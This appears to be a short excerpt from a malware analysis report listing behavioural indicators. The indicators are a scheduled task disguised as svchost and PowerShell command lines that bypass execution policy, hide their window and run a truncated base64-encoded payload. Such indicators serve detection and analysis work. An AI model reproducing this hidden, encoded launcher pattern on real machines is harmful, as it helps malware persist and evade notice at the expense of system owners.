Technical Information
- <SYSTEM32>\tasks\svchost
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -WindowStyle Hidden -Encoded JABiADQAMAAgAD0AIAAiAEgANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATwAxAFoAZgBYAEEAYgAxADMASABmAE8AeAB3AE8AQgA0AGkARQBTAEUAaQBpAEsASQBxAFMASQBaAEMAUwBJ...' (with hidden window)
- '<SYSTEM32>\taskeng.exe' {E269BDC7-D2F1-451D-B989-D992E31B346B} S-1-5-21-1960123792-2022915161-3775307078-1001:bvogbpbaqlst\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy ByPass -WindowStyle Hidden -Encoded JABiADQAMAAgAD0AIAAiAEgANABzAEkAQQBBAEEAQQBBAEEAQQBFAEEATwAxAFoAZgBYAEEAYgAxADMASABmAE8AeAB3AE8AQgA0AGkARQBTAEUAaQBpAEsASQBxAFMASQBaAEMAUwBJ...